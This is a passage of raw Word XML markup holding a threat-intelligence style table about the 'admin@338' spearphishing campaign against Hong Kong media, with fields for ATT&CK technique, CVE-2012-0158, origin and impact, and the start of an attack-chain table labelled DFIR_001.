          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="681FA307" w14:textId="77777777" w:rsidR="00DD1FAC" w:rsidRDefault="00DD1FAC" w:rsidP="00FC027E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>admin@338</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="20BE29AC" w14:textId="77777777" w:rsidR="00DD1FAC" w:rsidRPr="00387DCC" w:rsidRDefault="00DD1FAC" w:rsidP="00FC027E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD1FAC" w:rsidRPr="00B857D7" w14:paraId="070FFD77" w14:textId="77777777" w:rsidTr="00FC027E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6204CEE3" w14:textId="77777777" w:rsidR="00DD1FAC" w:rsidRPr="007328DE" w:rsidRDefault="00DD1FAC" w:rsidP="00FC027E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Initial Access Vector</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6D81BFC4" w14:textId="77777777" w:rsidR="00DD1FAC" w:rsidRPr="007328DE" w:rsidRDefault="00DD1FAC" w:rsidP="00FC027E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="007328DE">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>T1566.001 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="007328DE">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="007328DE">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Spearphishing</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="007328DE">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> Attachment</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="25A6B239" w14:textId="77777777" w:rsidR="00DD1FAC" w:rsidRPr="00387DCC" w:rsidRDefault="00DD1FAC" w:rsidP="00FC027E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD1FAC" w:rsidRPr="00B857D7" w14:paraId="2A8AB2DE" w14:textId="77777777" w:rsidTr="00FC027E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0B7B8005" w14:textId="77777777" w:rsidR="00DD1FAC" w:rsidRDefault="00DD1FAC" w:rsidP="00FC027E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Attack Origin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1BEB05BA" w14:textId="77777777" w:rsidR="00DD1FAC" w:rsidRPr="007328DE" w:rsidRDefault="00DD1FAC" w:rsidP="00FC027E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>China</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2247761B" w14:textId="77777777" w:rsidR="00DD1FAC" w:rsidRPr="00387DCC" w:rsidRDefault="00DD1FAC" w:rsidP="00FC027E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD1FAC" w:rsidRPr="00B857D7" w14:paraId="3B596091" w14:textId="77777777" w:rsidTr="00FC027E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="25FCA5F3" w14:textId="77777777" w:rsidR="00DD1FAC" w:rsidRDefault="00DD1FAC" w:rsidP="00FC027E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Target Location</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="687710B3" w14:textId="77777777" w:rsidR="00DD1FAC" w:rsidRDefault="00DD1FAC" w:rsidP="00FC027E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Hong Kong</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3AC8906C" w14:textId="77777777" w:rsidR="00DD1FAC" w:rsidRPr="00387DCC" w:rsidRDefault="00DD1FAC" w:rsidP="00FC027E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD1FAC" w:rsidRPr="00B857D7" w14:paraId="11D3ACFC" w14:textId="77777777" w:rsidTr="00FC027E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6EDA72A4" w14:textId="77777777" w:rsidR="00DD1FAC" w:rsidRDefault="00DD1FAC" w:rsidP="00FC027E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Target Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4D6CE0DC" w14:textId="77777777" w:rsidR="00DD1FAC" w:rsidRDefault="00DD1FAC" w:rsidP="00FC027E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Media</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="64FB2552" w14:textId="77777777" w:rsidR="00DD1FAC" w:rsidRPr="00387DCC" w:rsidRDefault="00DD1FAC" w:rsidP="00FC027E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD1FAC" w:rsidRPr="00B857D7" w14:paraId="35AEE391" w14:textId="77777777" w:rsidTr="00FC027E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="009FEC22" w14:textId="77777777" w:rsidR="00DD1FAC" w:rsidRDefault="00DD1FAC" w:rsidP="00FC027E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="12328AC1" w14:textId="77777777" w:rsidR="00DD1FAC" w:rsidRDefault="00DD1FAC" w:rsidP="00FC027E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Exfiltration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3801BCA5" w14:textId="77777777" w:rsidR="00DD1FAC" w:rsidRDefault="00DD1FAC" w:rsidP="00FC027E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Monitoring media orgs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD1FAC" w:rsidRPr="00B857D7" w14:paraId="7A36CD02" w14:textId="77777777" w:rsidTr="00FC027E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="115CF6C3" w14:textId="77777777" w:rsidR="00DD1FAC" w:rsidRDefault="00DD1FAC" w:rsidP="00FC027E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Vulnerabilities Exploited</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="36735C73" w14:textId="77777777" w:rsidR="00DD1FAC" w:rsidRDefault="00DD1FAC" w:rsidP="00FC027E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>CVE-2012-0158</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="02AE77CE" w14:textId="77777777" w:rsidR="00DD1FAC" w:rsidRDefault="00DD1FAC" w:rsidP="00FC027E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD1FAC" w:rsidRPr="00B857D7" w14:paraId="57E125DC" w14:textId="77777777" w:rsidTr="00FC027E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2363C842" w14:textId="77777777" w:rsidR="00DD1FAC" w:rsidRDefault="00DD1FAC" w:rsidP="00FC027E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Related Attack Patterns</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="46064034" w14:textId="77777777" w:rsidR="00DD1FAC" w:rsidRDefault="00DD1FAC" w:rsidP="00FC027E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="78D9D584" w14:textId="77777777" w:rsidR="00DD1FAC" w:rsidRDefault="00DD1FAC" w:rsidP="00FC027E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>TBC</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD1FAC" w:rsidRPr="00B857D7" w14:paraId="4F630C10" w14:textId="77777777" w:rsidTr="00FC027E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="73763AF7" w14:textId="77777777" w:rsidR="00DD1FAC" w:rsidRDefault="00DD1FAC" w:rsidP="00FC027E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Preceded By</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="19C111F7" w14:textId="77777777" w:rsidR="00DD1FAC" w:rsidRDefault="00DD1FAC" w:rsidP="00FC027E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>TBC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1EDAEA81" w14:textId="77777777" w:rsidR="00DD1FAC" w:rsidRDefault="00DD1FAC" w:rsidP="00FC027E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">Reference </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Chain_ID</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD1FAC" w:rsidRPr="00B857D7" w14:paraId="002C1A37" w14:textId="77777777" w:rsidTr="00FC027E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="25D29A4E" w14:textId="77777777" w:rsidR="00DD1FAC" w:rsidRDefault="00DD1FAC" w:rsidP="00FC027E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Schema Version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1B7669AC" w14:textId="77777777" w:rsidR="00DD1FAC" w:rsidRDefault="00DD1FAC" w:rsidP="00FC027E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>0.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="28C09BF7" w14:textId="77777777" w:rsidR="00DD1FAC" w:rsidRDefault="00DD1FAC" w:rsidP="00FC027E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>To allow for future new chain models</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD1FAC" w:rsidRPr="00B857D7" w14:paraId="3FCD39A9" w14:textId="77777777" w:rsidTr="00FC027E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="36F66E66" w14:textId="77777777" w:rsidR="00DD1FAC" w:rsidRDefault="00DD1FAC" w:rsidP="00FC027E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="26F5FE4C" w14:textId="77777777" w:rsidR="00DD1FAC" w:rsidRDefault="00DD1FAC" w:rsidP="00FC027E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>2015</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="46297729" w14:textId="77777777" w:rsidR="00DD1FAC" w:rsidRDefault="00DD1FAC" w:rsidP="00FC027E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD1FAC" w:rsidRPr="00B857D7" w14:paraId="77FA3DCF" w14:textId="77777777" w:rsidTr="00FC027E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3F29D319" w14:textId="77777777" w:rsidR="00DD1FAC" w:rsidRDefault="00DD1FAC" w:rsidP="00FC027E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="42944398" w14:textId="77777777" w:rsidR="00DD1FAC" w:rsidRDefault="00DD1FAC" w:rsidP="00FC027E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4CF1EC12" w14:textId="77777777" w:rsidR="00DD1FAC" w:rsidRDefault="00DD1FAC" w:rsidP="00FC027E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="56223525" w14:textId="77777777" w:rsidR="00DD1FAC" w:rsidRPr="00AC7A85" w:rsidRDefault="00DD1FAC" w:rsidP="00DD1FAC"/>
    <w:p w14:paraId="795DAB86" w14:textId="77777777" w:rsidR="00DD1FAC" w:rsidRDefault="00DD1FAC" w:rsidP="00DD1FAC">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r>
        <w:t>Attack Technique Chain (Initial Access)</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="440"/>
        <w:gridCol w:w="1281"/>
        <w:gridCol w:w="1794"/>
        <w:gridCol w:w="636"/>
        <w:gridCol w:w="595"/>
        <w:gridCol w:w="555"/>
        <w:gridCol w:w="880"/>
        <w:gridCol w:w="4275"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DD1FAC" w:rsidRPr="002D1D50" w14:paraId="3CC52F1C" w14:textId="77777777" w:rsidTr="006474F5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="198A20C7" w14:textId="77777777" w:rsidR="00DD1FAC" w:rsidRDefault="00DD1FAC" w:rsidP="00FC027E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1281" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="631837C0" w14:textId="77777777" w:rsidR="00DD1FAC" w:rsidRPr="002D1D50" w:rsidRDefault="00DD1FAC" w:rsidP="00FC027E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Chain_ID</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1794" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="331FA933" w14:textId="5F59073B" w:rsidR="00DD1FAC" w:rsidRPr="002D1D50" w:rsidRDefault="004A56C2" w:rsidP="00FC027E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>DFIR</w:t>
            </w:r>
            <w:r w:rsidR="00DD1FAC">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>_001</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="636" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="60AAEB4F" w14:textId="77777777" w:rsidR="00DD1FAC" w:rsidRPr="002D1D50" w:rsidRDefault="00DD1FAC" w:rsidP="00FC027E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="595" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="1812111D" w14:textId="77777777" w:rsidR="00DD1FAC" w:rsidRPr="002D1D50" w:rsidRDefault="00DD1FAC" w:rsidP="00FC027E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Ver</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="555" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="08275018" w14:textId="77777777" w:rsidR="00DD1FAC" w:rsidRPr="002D1D50" w:rsidRDefault="00DD1FAC" w:rsidP="00FC027E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>0.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="880" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="673851ED" w14:textId="77777777" w:rsidR="00DD1FAC" w:rsidRPr="002D1D50" w:rsidRDefault="00DD1FAC" w:rsidP="00FC027E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4275" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="76ABED8D" w14:textId="77777777" w:rsidR="00DD1FAC" w:rsidRPr="002D1D50" w:rsidRDefault="00DD1FAC" w:rsidP="00FC027E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD1FAC" w:rsidRPr="002D1D50" w14:paraId="7212CF87" w14:textId="77777777" w:rsidTr="006474F5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="73AD2CCB" w14:textId="77777777" w:rsidR="00DD1FAC" w:rsidRPr="002D1D50" w:rsidRDefault="00DD1FAC" w:rsidP="00FC027E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1281" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="559C6FF7" w14:textId="77777777" w:rsidR="00DD1FAC" w:rsidRPr="002D1D50" w:rsidRDefault="00DD1FAC" w:rsidP="00FC027E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1794" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6D803942" w14:textId="77777777" w:rsidR="00DD1FAC" w:rsidRPr="002D1D50" w:rsidRDefault="00DD1FAC" w:rsidP="00FC027E">
